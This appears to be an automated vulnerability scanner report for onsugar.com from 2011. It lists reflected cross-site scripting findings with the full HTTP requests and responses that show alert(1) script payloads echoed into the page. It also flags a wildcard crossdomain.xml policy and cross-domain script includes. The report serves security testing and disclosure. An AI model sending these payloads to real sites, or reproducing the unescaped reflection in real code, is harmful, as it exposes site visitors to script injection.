1. Cross-site scripting (reflected)
1.1. http://www.onsugar.com/h [REST URL parameter 1]
1.2. http://www.onsugar.com/h [REST URL parameter 1]
1.3. http://www.onsugar.com/help [REST URL parameter 1]
1.4. http://www.onsugar.com/help [REST URL parameter 1]
1.5. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]
1.6. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]
1.7. http://www.onsugar.com/static/ck.php [REST URL parameter 2]
1.8. http://www.onsugar.com/static/ck.php [REST URL parameter 2]
3. Cross-domain script include
3.2. http://www.onsugar.com/help
3.3. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php
5. HTML does not specify charset
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /h |
GET /he87cc"-alert(1)- Host: www.onsugar.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=191106292 |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web013-lax1 X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: ss1=0%7C1307131374 Connection: close Date: Wed, 11 May 2011 16:29:34 GMT Server: lighttpd/1.4.26 Content-Length: 7232 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script> var comscoreHash = "46f25d64aecf90301f4 COMSCORE.beacon({ c1:2, c2:6035900, c3:"", c4:"www.onsugar.com/he87cc"-alert(1)- c5:"", c6:"", c15:comscoreHash }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /h |
GET /h6c078"><script>alert(1)< Host: www.onsugar.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=191106292 |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web014-lax1 X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: ss1=0%7C1307131372 Connection: close Date: Wed, 11 May 2011 16:29:32 GMT Server: lighttpd/1.4.26 Content-Length: 7337 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <img src="http://b.scorec ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /help |
GET /helpbf07a"><script>alert(1)< Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.onsugar.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=191106292 |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web018-lax1 X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: ss1=0%7C1307131351 Connection: close Date: Wed, 11 May 2011 16:29:11 GMT Server: lighttpd/1.4.26 Content-Length: 7352 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <img src="http://b.scorec ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /help |
GET /helpa42d5"-alert(1)- Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.onsugar.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=191106292 |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web019-lax1 X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: ss1=0%7C1307131353 Connection: close Date: Wed, 11 May 2011 16:29:13 GMT Server: lighttpd/1.4.26 Content-Length: 7247 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script> var comscoreHash = "46f25d64aecf90301f4 COMSCORE.beacon({ c1:2, c2:6035900, c3:"", c4:"www.onsugar.com/helpa42d5"-alert(1)- c5:"", c6:"", c15:comscoreHash }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /modules/facebook_connect |
GET /modules/facebook_connect Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.facebook.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=v02tdi2s0f |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web013-lax1 X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: ss1=0%7C1307130920 Connection: close Date: Wed, 11 May 2011 16:22:00 GMT Server: lighttpd/1.4.26 Content-Length: 7469 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <img src="http://b.scorec ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /modules/facebook_connect |
GET /modules/facebook_connect Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.facebook.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=v02tdi2s0f |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web013-lax1 X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: ss1=0%7C1307130923 Connection: close Date: Wed, 11 May 2011 16:22:03 GMT Server: lighttpd/1.4.26 Content-Length: 7364 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script> var comscoreHash = "dff6cdfdd8fd0dc992a COMSCORE.beacon({ c1:2, c2:6035900, c3:"", c4:"www.onsugar.com c5:"", c6:"", c15:comscoreHash }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /static/ck.php |
GET /static/229d0"><script>alert(1)< Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.tressugar.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web018-lax1 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=vicpn4jpru Set-Cookie: fg_locale=0; expires=Thu, 12-May-2011 15:04:53 GMT; path=/ Set-Cookie: client_locale=US; expires=Thu, 12-May-2011 15:04:53 GMT; path=/ Set-Cookie: ss1=0%7C1307126293 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Connection: close Date: Wed, 11 May 2011 15:04:53 GMT Server: lighttpd/1.4.26 Content-Length: 7466 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <img src="http://b.scorec ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /static/ck.php |
GET /static/dc357"-alert(1)- Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.tressugar.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web014-lax1 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=59plojbkpp Set-Cookie: fg_locale=0; expires=Thu, 12-May-2011 15:04:55 GMT; path=/ Set-Cookie: client_locale=US; expires=Thu, 12-May-2011 15:04:55 GMT; path=/ Set-Cookie: ss1=0%7C1307126295 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Connection: close Date: Wed, 11 May 2011 15:04:55 GMT Server: lighttpd/1.4.26 Content-Length: 7361 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script> var comscoreHash = "c203779e426810a8a1f COMSCORE.beacon({ c1:2, c2:6035900, c3:"", c4:"www.onsugar.com c5:"", c6:"", c15:comscoreHash }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.onsugar.com |
HTTP/1.0 200 OK X-Sugar-Origin-Server: sugar-prod-web017-lax1 Content-Type: text/xml Accept-Ranges: bytes Last-Modified: Wed, 28 Apr 2010 20:15:15 GMT Content-Length: 268 Connection: close Date: Wed, 11 May 2011 15:04:27 GMT Server: lighttpd/1.4.26 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /h |
GET /h HTTP/1.1 Host: www.onsugar.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=191106292 |
HTTP/1.1 404 Not Found X-Sugar-Origin-Server: sugar-prod-web018-lax1 X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: ss1=0%7C1307131340 Connection: close Date: Wed, 11 May 2011 16:29:00 GMT Server: lighttpd/1.4.26 Content-Length: 7010 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <meta http-equiv="X-UA <script src="//ajax.googleapis <script src="//ajax.googleapis ...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... </script> <script type="text/javascript" src="http://www ...[SNIP]... </div> <script src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /help |
GET /help HTTP/1.1 Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.onsugar.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=191106292 |
HTTP/1.1 200 OK X-Sugar-Origin-Server: sugar-prod-web016-lax1 X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Cookie Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: ss1=0%7C1307131320 Connection: close Date: Wed, 11 May 2011 16:28:40 GMT Server: lighttpd/1.4.26 Content-Length: 7637 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <meta http-equiv="X-UA <script src="//ajax.googleapis <script src="//ajax.googleapis ...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... </script> <script type="text/javascript" src="http://www ...[SNIP]... </div> <script src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /modules/facebook_connect |
GET /modules/facebook_connect Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.facebook.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=v02tdi2s0f |
HTTP/1.1 200 OK X-Sugar-Origin-Server: sugar-prod-web014-lax1 X-Powered-By: PHP/5.2.14 Cache-Control: max-age=225065900 Expires: Pragma: Vary: Vary: Accept-Encoding Content-type: text/html Connection: close Date: Wed, 11 May 2011 16:21:39 GMT Server: lighttpd/1.4.26 Content-Length: 636 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... XD) receiver page. It needs to be placed on your domain so that the Javascript library can communicate within the iframe permission model. Put it here: http://www.example.com/xd --> <script src='http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /static/ck.php |
GET /robots.txt HTTP/1.0 Host: www.onsugar.com |
HTTP/1.0 200 OK X-Sugar-Origin-Server: sugar-prod-web014-lax1 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=c8kg3r54l6 Set-Cookie: fg_locale=0; expires=Thu, 12-May-2011 15:04:27 GMT; path=/ Set-Cookie: client_locale=US; expires=Thu, 12-May-2011 15:04:27 GMT; path=/ Set-Cookie: ss1=0%7C1307126267 Content-type: text/plain Connection: close Date: Wed, 11 May 2011 15:04:27 GMT Server: lighttpd/1.4.26 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.onsugar.com |
Path: | /modules/facebook_connect |
GET /modules/facebook_connect Host: www.onsugar.com Proxy-Connection: keep-alive Referer: http://www.facebook.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=v02tdi2s0f |
HTTP/1.1 200 OK X-Sugar-Origin-Server: sugar-prod-web014-lax1 X-Powered-By: PHP/5.2.14 Cache-Control: max-age=225065900 Expires: Pragma: Vary: Vary: Accept-Encoding Content-type: text/html Connection: close Date: Wed, 11 May 2011 16:21:39 GMT Server: lighttpd/1.4.26 Content-Length: 636 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |